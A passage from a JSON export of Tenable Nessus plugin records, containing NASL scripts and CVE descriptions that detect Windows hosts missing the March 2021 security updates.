"CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000847.NASL", "href": "https://www.tenable.com/plugins/nessus/147221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147221);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\"\n );\n script_xref(name:\"MSKB\", value:\"5000847\");\n script_xref(name:\"MSKB\", value:\"5000840\");\n script_xref(name:\"MSFT\", value:\"MS21-5000847\");\n script_xref(name:\"MSFT\", value:\"MS21-5000840\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000840: Windows Server 2012 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000840\nor cumulative update 5000847. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26886,\n CVE-2021-26896, CVE-2021-27063)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26882, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000847-monthly-rollup-8afa2933-e9da-4481-a0bc-18deb314974e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df958afd\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000840-security-only-update-a5261347-8a42-4727-a544-bd66fb3d4d70\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2561ac2c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000840 or Cumulative Update KB5000847.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000847',\n '5000840'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000847, 5000840])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:22", "description": "The remote Windows host is missing security update 5000853 or cumulative update 5000848. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000853: Windows 8.1 and Windows Server 2012 R2 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000848.NASL", "href": "https://www.tenable.com/plugins/nessus/147229", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147229);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000848\");\n script_xref(name:\"MSKB\", value:\"5000853\");\n script_xref(name:\"MSFT\", value:\"MS21-5000848\");\n script_xref(name:\"MSFT\", value:\"MS21-5000853\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000853: Windows 8.1 and Windows Server 2012 R2 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000853\nor cumulative update 5000848. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26882, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000853-security-only-update-8dac9fb9-dbc9-4484-8e56-df5492d20808\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be16b68e\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000848-monthly-rollup-52f23db9-e1b0-4829-81b9-198fc82891a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ff1e9b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000853 or Cumulative Update KB5000848.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000848',\n '5000853'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000848, 5000853])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:44", "description": "The remote Windows host is missing security update 5000809.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095, CVE-2021-26862, CVE-2021-26863, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26876, CVE-2021-26881, CVE-2021-27085)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000809: Windows 10 Version 1803 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000809.NASL", "href": "https://www.tenable.com/plugins/nessus/147224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147224);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000809\");\n script_xref(name:\"MSFT\", value:\"MS21-5000809\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000809: Windows 10 Version 1803 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000809.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26862, CVE-2021-26863, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26871,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26885, CVE-2021-26889, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26881, CVE-2021-27085)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000809-os-build-17134-2087-2601a686-8e12-449d-913c-a63a9b73e2eb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ef7d4b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000809.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27085\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000809'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000809])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:45", "description": "The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000803: Windows Security Update (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000803.NASL", "href": "https://www.tenable.com/plugins/nessus/147222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147222);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000803\");\n script_xref(name:\"MSFT\", 